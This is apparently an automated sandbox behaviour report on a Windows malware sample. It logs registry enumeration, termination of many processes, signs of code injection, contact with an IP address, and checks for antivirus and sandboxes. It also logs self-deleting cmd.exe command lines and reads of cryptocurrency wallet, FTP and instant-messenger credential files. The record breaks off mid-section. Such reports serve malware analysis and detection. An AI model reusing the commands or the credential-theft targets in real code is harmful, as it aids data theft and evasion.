RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x00000540 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall		2
RegOpenKeyExA Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000344 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x000002b0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000350 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000358 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x0000035c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000360 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0

Terminates another process (50 out of 60 events)

Time & API	Arguments	Status
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 3016 process_handle: 0x000003d8
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 3016 process_handle: 0x000003d8	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2112 process_handle: 0x000003f0
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2112 process_handle: 0x000003f0	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 200 process_handle: 0x0000040c
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 200 process_handle: 0x0000040c	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 1348 process_handle: 0x00000428
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 1348 process_handle: 0x00000428	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 1204 process_handle: 0x00000440
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 1204 process_handle: 0x00000440	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2356 process_handle: 0x00000458
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2356 process_handle: 0x00000458	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 1868 process_handle: 0x00000470
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 1868 process_handle: 0x00000470	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2200 process_handle: 0x00000488
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2200 process_handle: 0x00000488	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 808 process_handle: 0x000004a0
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 808 process_handle: 0x000004a0	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2668 process_handle: 0x000004b8
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2668 process_handle: 0x000004b8	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2656 process_handle: 0x000003f0
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2656 process_handle: 0x000003f0	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2240 process_handle: 0x0000040c
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2240 process_handle: 0x0000040c	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2208 process_handle: 0x00000424
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2208 process_handle: 0x00000424	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2684 process_handle: 0x00000440
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2684 process_handle: 0x00000440	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2880 process_handle: 0x00000458
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2880 process_handle: 0x00000458	1
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2248 process_handle: 0x00000470
NtTerminateProcess Sept. 6, 2021, 6:19 p.m.	status_code: 0xffffffff process_identifier: 2248 process_handle: 0x00000470	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 1296 process_handle: 0x00000488
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 1296 process_handle: 0x00000488	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3024 process_handle: 0x000004a0
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3024 process_handle: 0x000004a0	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 1472 process_handle: 0x000004b8
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 1472 process_handle: 0x000004b8	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 1444 process_handle: 0x000004d0
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 1444 process_handle: 0x000004d0	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 2080 process_handle: 0x000003e4
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 2080 process_handle: 0x000003e4	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3108 process_handle: 0x000003fc
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3108 process_handle: 0x000003fc	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3248 process_handle: 0x00000418
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3248 process_handle: 0x00000418	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3360 process_handle: 0x00000434
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3360 process_handle: 0x00000434	1
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3472 process_handle: 0x0000044c
NtTerminateProcess Sept. 6, 2021, 6:20 p.m.	status_code: 0xffffffff process_identifier: 3472 process_handle: 0x0000044c	1

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\ghjkl.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Oggnfkemtibcinconsoleapp16.exe"
cmdline	C:\Windows\System32\cmd.exe /c C:\Windows\system32\timeout.exe 3 & del "Oggnfkemtibcinconsoleapp16.exe"

Communicates with host for which no DNS query was performed (1 event)

host

45.142.215.237

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2716 region_size: 598016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000450	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:20 p.m.	process_identifier: 1908 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000468	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:20 p.m.	process_identifier: 3324 region_size: 212992 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000460	1

Attempts to identify installed AV products by installation directory (13 events)

file	C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support
file	C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt
file	C:\ProgramData\Microsoft\Microsoft Antimalware
file	C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.etl
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetupResult.ini
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Install.log
file	C:\ProgramData\Microsoft\Microsoft Security Client
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\Application.etl
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.log
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Uninstall.log
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppOobe.etl

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Attempts to access Bitcoin/ALTCoin wallets (16 events)

file	C:\Users\test22\AppData\Roaming\Adobe\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\EditPlus\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\EditPlus\wallet.dat
file	C:\Users\test22\AppData\Roaming\Macromedia\wallet.dat
file	C:\Users\test22\AppData\Roaming\Identities\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\Macromedia\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\HNC\wallet.dat
file	C:\Users\test22\AppData\wallet.dat
file	C:\Users\test22\AppData\Roaming\Microsoft\wallet.dat
file	C:\Users\test22\AppData\Roaming\Microsoft\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\HNC\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\Identities\wallet.dat
file	C:\Users\test22\AppData\wallets\wallet.dat
file	C:\Users\test22\AppData\Roaming\wallet.dat
file	C:\Users\test22\AppData\Roaming\Adobe\wallet.dat

Attempts to detect Cuckoo Sandbox through the presence of a file (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.py
file	C:\Python27\agent.pyw

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\filezilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\

Harvests information related to installed instant messenger clients (1 event)

file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml

Potential code injection by writing to the memory of another process (8 events)

Time & API	Arguments	Status	Return
